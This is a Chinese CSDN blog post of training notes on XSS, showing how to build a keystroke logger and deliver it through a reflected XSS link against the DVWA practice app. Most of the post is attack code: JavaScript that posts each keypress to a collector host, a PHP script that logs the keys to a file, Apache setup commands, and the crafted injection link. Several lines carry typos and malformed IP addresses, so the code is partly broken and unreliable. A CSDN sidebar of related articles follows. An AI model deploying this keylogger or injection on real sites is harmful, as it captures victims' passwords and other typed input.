【安全牛学习笔记】​XSS- 键盘记录器和反射型XSS

最新推荐文章于 2024-05-06 12:53:36 发布
最新推荐文章于 2024-05-06 12:53:36 发布
阅读量1k 收藏
点赞数
分类专栏: 信息安全 文章标签: 安全 Security+ 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/edu_aqniu/article/details/78142963
版权

XSS                        

Keylogger.js 

document.onkeypress = function(evt){ 

    evt = evt || window.event

    key = String.fromCharCode(evt.charCode)

    if(key){

        var http = new XMLHttpRequest();

        var param = encodeUR(key);

        http.open("POST","http://192.168.20.8/keylogger.php",true);               

        http.setRequestHeader("Content-type","application/x-www-form-urlencoded");

        http.send("key="+param);

    }                                                           

root@R:~# service apache2 start

root@R:~# cd /var/www/html/

root@R:/var/www/html# gedit keylogger.js

document.onkeypress = function(evt){

    evt = evt || window.event

    key = String.fromCharCode(evt.charCode)

    if(key){

        var http = new XMLHttpRequest();

        var param = encodeUR(key);

        http.open("POST","http://192.168.20.8/keylogger.php",true);

        http.setRequestHeader("Content-type","application/x-www-form-urlencoded");

        http.send("key="+param);

    }

}

XSS                                                               

Keylogger.php                                                              <?php                                                       

    $key=$_POST['key'];                                               

    $logfile="keylog.txt";                                             

    $fp = fopen($logfile,"a");                                         

    fwrite($fp,$key);                                                 

    fclose($fp);                                                    

    ?>                                                           

<scirpt+src="http://1.1.1.1/keylogger.js"></script>                     

<a                                                                

herf="http://192.168.20.10/dvwa/vulnerabilites/xss_r/?name=<script+src='

http://192.168.1.20.8/keylogger.js'></script>">xss</a>

root@R:/var/www/html# gedit keylogger.php

    <?php

    $key=$_POST['key'];

    $logfile="keylog.txt";

    $fp = fopen($logfile,"a");

    fwrite($fp,$key);

    fclose($fp);

    ?>

root@R:/var/www/html# gedit keylogger.txt

root@R:/var/www/html# ls

index.html  keylogger.js  keylogger.php  keylog.txt

root@R:/var/www/html# chmod 777 keylog.txt

root@R:/var/www/html# gedit a.html

<a herf="http://192.168.1.107/dvwa/vulnerabilites/xss_r/?name=<script+src='http://192.168.1.1.102/keylogger.js'></script>">xss</a>


XSS                                                               

Xsser                                                              

    命令/图形化 工具                                                 

    绕过服务器端输入筛选                                              

       10进制/16进制 编码                                 

最低0.47元/天 解锁文章
爱学习的小牛
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
xss-labs-master.zip(xss注入通关游戏/靶场)
03-21
`xss-labs-master.zip`包含了一个专门用于学习和实践XSS注入的通关游戏或靶场,对于网络安全测试人员来说,这是一个极好的学习资源。 **XSS分类** 1. **存储XSS**:也称为持久XSS,攻击者将恶意脚本存入服务器...
WEB渗透学习-XSS-labs靶场
04-20
XSS-labs是一个专门针对XSS学习平台,为网络安全从业者和新手提供了丰富的练习场景,帮助他们深入理解和掌握这种攻击手段。 XSS-labs设计了一套关卡制的学习路径,由浅入深,逐步提高难度。每个关卡都代表一种或...
spring boot 2.x解决反射xss
虫二
07-22 1796
spring boot 2.x解决反射xss
【Java代码审计】XSS漏洞产生原理及其修复
m0_62783065的博客
05-17 5048
【Java代码审计】XSS漏洞产生原理及其修复
XSS Challenges 靶场通关解析
最新发布
Flag少侠的博客
05-06 2045
XSS Challenges(跨站脚本攻击挑战)是一种用于学习和测试跨站脚本(XSS)漏洞的实验性平台。这些挑战旨在帮助安全研究人员和开发人员了解XSS漏洞的工作原理、检测方法和防御技巧。通常,XSS Challenges平台提供一系列不同级别和类XSS漏洞场景,参与者需要利用这些漏洞实现特定的攻击目标。这些挑战可以包括在网页输入框中注入恶意脚本、利用DOM(文档对象模)漏洞执行JavaScript代码等。参与者需要通过分析和利用漏洞,成功地触发XSS漏洞并实现攻击目标,从而完成挑战。
UFS Explorer Professional Recovery: 恢复被 eCryptfs 加密的数据
sanyuan7783的博客
01-31 1272
eCryptfs是Linux上流行的加密软件包。它在大多数 Linux 发行版的标准存储库中可用,并且通常被 NAS 供应商用于加密群晖 Synology、威联通 QNAP、Asustor、TerraMaster 等设备上的共享文件夹。eCryptfs 不是加密整个驱动器,而是可以保护包含敏感信息的单个文件和目录。它还允许加密文件和目录名称。加密元数据直接存储在文件的标头中,这使得加密项彼此独立。
反射XSS漏洞的条件+类+危害+解决
gb4215287的博客
02-04 2891
XSS攻击需要具备两个条件:需要向web页面注入恶意代码;这些恶意代码能够被浏览器成功的执行。 XSS攻击有2种: 反射攻击; 存储攻击 XSS反射攻击,恶意代码并没有保存在目标网站,通过引诱用户点击一个链接到目标网站的恶意链接来实施攻击的。 XSS存储攻击,恶意代码被保存到目标网站的服务器中,这种攻击具有较强的稳定性和持久性,比较常见场景是在博客,论坛、OA、CRM等社交...
XSS 攻击的检测和修复方法
Java徐师兄的博客
07-13 2814
XSS 攻击是一种常见和危险的 Web 攻击,开发者需要对输入数据进行过滤和转义,使用安全的编程语言和框架以及安全的数据库操作,采用 CSP 等措施来防止 XSS 攻击。同时,用户也需要注意不要轻易点击不明来源的链接,避免被诱导访问恶意网站,从而保护自己的信息安全。// 去除输入数据中的 HTML 和 PHP 标签 $data = strip_tags($data);
xss-labs-master.rar
05-09
"xss-labs-master.rar" 提供了一个针对XSS漏洞的专项练习平台,旨在帮助初学者及安全爱好者提升对XSS攻击的理解和防御能力。这个靶机资源共分为二十个关卡,由浅入深,逐步引导用户掌握XSS攻防的核心技巧。 一、XSS...
网络安全原理与应用:反射XSS攻击演示.pptx
05-16
在演示中,我们通过DVWA(Damn Vulnerable Web Application)这个安全学习平台,逐步展示了不同安全级别的反射XSS攻击。 1. **初级攻击**: - 在DVWA的安全级别设置为Low时,攻击者可以在输入框中输入`<script>...
奇安信安全扫描漏洞解决路径遍历和存储xss反射xss攻击漏洞
11-09
亲测可用,中级漏洞,解决服务器段请求伪造 final String forURL = ESAPI.encoder().encodeForURL(url); restTemplate.exchange(forURL, HttpMethod.GET,new HttpEntity<String>(headers), List.class, params);
CompTIA Security+ 学习指南
01-24
professor-messer-comptia-sy0-401-security-plus-study-guide-v5
searchsploit搜索漏洞不显示路径问题解决办法
qq_51548035的博客
10-06 7528
searchsploit搜索漏洞不显示路径问题解决办法
you must specify a host type if you use `--no-verify'
lijing_lj928的专栏
05-22 4834
在64位机器下编译libghttp碰到的问题 libghttp是gnome下的HTTP客户端库, 实现http功能, 可以替换curl 的http功能, 在32位的机器上编译没问题, 在64位的机器上, configure 不过去. 错误信息是: ltconfig: you must specify a host type if you use `--no-verify' Try `
linux中socket编程出现 connect: No route to host
qq_35191331的博客
07-15 8100
原因是防火墙没有关掉, centos 7使用: systemctl stop firewalld.service 命令关闭防火墙
学习lua结合unity遇到错误信息的解决方法
热门推荐
蛰伏--当你不够强大时,就不要放弃努力
04-28 2万+
require "uiDefine" 报错信息:module 'uiDefine' not found: no fieldpackage.preload['uiDefine'] no such builtin lib'uiDefine' 解决方法: 在require "ui.uiDefine" 在基于lua根目录的下require全路径,例如Assets/Scripts/lua为根目录 static public class UnityCommonExtension { stati...
Ubuntu apt-get 签名无效的问题解决
xiaoshang的专栏
11-24 5757
Ubuntu软件更新的时候经常出现: W: 验证签名时发生了一个错误。软件仓库将不会更新并将使用先前的索引文件。GPG 错误。http://tw.archive.ubuntu.com karmic-proposed Release: 下列签名无效: BADSIG40976EAF437D05B5 Ubuntu Archive Automatic Signing Key W: 验证签名时发生
OpenSSL握手重协商过程中存在漏洞可导致拒绝服务
鹈鹕门将的博客
05-23 2965
OpenSSL是一个非常流行的通用加密库,可为Web认证服务提供SSL/TLS协议的具体实现。最近以来,人们发现OpenSSL中存在几个漏洞。我们写过几篇文章分析这些漏洞,包括“CVE-2017-3731:截断数据包可导致OpenSSL拒绝服务”、“SSL死亡警告(CVE-2016-8610)可导致OpenSSL服务器拒绝服务”等。今天,我们将要分析的是CVE-2017-3733这个高危级漏洞,即E
xss-labs靶场通关
10-13
XSS-Labs靶场是一个流行的在线环境,用于学习和实践跨站脚本攻击(XSS)防御和利用技术。它通过一系列挑战帮助用户深入理解Web安全,特别是针对客户端输入验证不足的情况。以下是关于XSS-Labs靶场的一些关键知识点:...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值